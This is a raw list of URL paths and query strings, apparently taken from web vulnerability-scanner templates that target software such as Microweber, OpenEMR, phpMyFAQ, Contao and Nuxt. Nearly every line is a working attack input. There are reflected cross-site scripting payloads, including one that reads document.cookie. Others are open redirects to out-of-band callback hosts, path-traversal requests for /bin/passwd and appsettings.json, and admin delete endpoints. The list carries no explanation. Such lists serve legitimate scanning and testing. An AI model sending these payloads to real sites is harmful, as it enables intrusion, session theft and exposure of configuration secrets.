/module/?module=admin%2Fmodules%2Fmanage&id=test%22+onmousemove%3dalert(document.domain)+xx=%22test&from_url=x
/embed.js
/karma.js
/?return_url=javascript:alert(document.domain)
/api/logout?redirect_to=http://oast.pro/
/demo/api/logout?redirect_to=/asdf%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/index.php/interact.sh
/user/login/?next=https%3A%2F%2Finteract.sh
/user/logout?next=https%3A%2F%2Finteract.sh
/user/register?next=https%3A%2F%2Finteract.sh
/user/resend-activation?next=https%3A%2F%2Finteract.sh
/module/?module=%27onm%3Ca%3Eouseover=alert(document.domain)%27%22tabindex=1&style=width:100%25;height:100%25;&id=x&data-show-ui=admin&class=x&from_url={{BaseURL}}
/api/module?type=%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&live_edit=true&from_url=test
/custom/%3Cimg%20src=x%20onerror=alert(document.domain)%3E
/share/api/notes/%3Cimg%20src=x%20onerror=alert(document.domain)%3E
/share/api/images/%3Cimg%20src=x%20onerror=alert(document.domain)%3E/filename
/contao/%22%3e%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/search.php?keywords=ABC%3Cdiv%20style=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E
/unsafe/plain/https://cve-2023-1496.s3.amazonaws.com/imgproxy_xss.svg
/?action=send2friend&artlang=aaaa%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/templates/pages/debug_panel.php?id={{randstr}}
/install/index.php?1692443074&space=%3Cimg%20src=1%20onerror=alert(document.domain)%3E
/editor_tools/rte_image_editor?types=%27;});alert(document.domain);$(picker).on(%27Noodles%27,%20function(result)%20{%20var%20XSS=%27
/project/switch/1?targetPath=http://oast.pro
/mobile/shop/lg/mispwapurl.php?LGD_OID=%3Cscript%3Ealert(document.domain)%3C/script%3E
/bbs/new.php?darkmode=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E
/api/image/cover-upload?filename=../appsettings.json
/__nuxt_vite_node__/module//bin/passwd
/__nuxt_vite_node__/module/C:/Windows/System32/calc.exe
/__nuxt_error?stack=%0A<script>alert(document.domain)</script>
/otobo/index.pl?Action=ExternalURLJump;URL=http://www.interact.sh
/path/to/CaptchaAction.php
/demo/api/logout?redirect_to=https://example.com
/demo/admin/page/8tojh1%22onmouseover%3d%22alert(1)%22style%3d%22position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%22yrr2n/edit
/edit/web/?domain=<htmL/+/OnpOintEReNTEr%0d=%0d[
/demo/api/save_dynamic_text
/amammad/Azadig/settings/hooks/523
/demo/module/?module=
/test/microweber-master/logout
/demo/module/?type=files/xss%27;eval.call%60%24%7B%27alert%28window.origin%29%27%7D%60;//&live_edit=true&remeber_path=true&ui=basic&start_path=media_host_base&from_admin=true&file_types=images&id=mw_admin_pictures_upload_browse_existing_modaledit-post-gallery-main&from_url=http://google.com/
/vuln2.php
/interface/main/backup.php
/openemr/interface/login/login.php?site=default
/start
/index.html?backBtn=%7B%22url%22:%22javascript:alert(document.domain)%22%7D
/index.html?refreshBtn=%7B%22url%22:%22javascript:alert(document.domain)%22%7D
/index.html?toolbar-config=%7B%22backBtn%22:%7B%22url%22:%22javascript:alert(document.domain)%22%7D,%22refreshBtn%22:%7B%22url%22:%22javascript:alert(document.domain)%22%7D%7D
/index.html?tags=%7B%22backBtn%22:%22javascript:alert(document.domain)%22%7D&highlight=%7B%22refreshBtn%22:%22javascript:alert(document.domain)%22%7D&layers=%7B%22backBtn%22:%22javascript:alert(document.domain)%22%7D&nav=%7B%22refreshBtn%22:%22javascript:alert(document.domain)%22%7D&toolbar=%7B%22backBtn%22:%22javascript:alert(document.domain)%22%7D&toolbar-config=%7B%22refreshBtn%22:%22javascript:alert(document.domain)%22%7D
/phpmyfaq/index.php?search=1af%22+onclick%3D
/migrate-email
/admin/index.php?action=SEX%22%3E%3CScRiPt%3Ealert(9699)%3C/ScRiPt%3E
/interface/forms/fee_sheet/review/fee_sheet_ajax.php?task=retrieve&mode=encounters&prev_encounter=%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E
/module
/index.php?action=add&cat=0
/admin/index.php
/admin/domains/{{domain_id}}/delete/
/admin/accounts/2/delete/
/admin/permissions/remove/?domid=2&daid=15
/Cockpit/
/ajax.php/draft/ticket.client.jfi710uc6f1h/attach
/path-to-vulnerable-page
/path/to/vulnerable/endpoint
/assets.php
/system/api/restApiViewer?param=%22%3E%3Cscript%3Ealert(window.location)%3C/script%3E
/system/api/graphqlViewer?apiKey=%22%3E%3Cscript%3Ealert(window.location)%3C/script%3E
/dashboard/#/projects
/pimcore-datahub-webservices/explorer/assets
/admin/configuration/mail-setup
/admin/?action=config&edit=1
/file=https://oast.pro
/__nuxt_error?stack=%0A{{url_encode(payload)}}
/?PagePrincipale/rss&id=1%27%3Cscript%3Ealert(document.domain)%3C/script%3E
/unsafe/plain/https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/refs/heads/main/helpers/payloads/retool-xss.svg
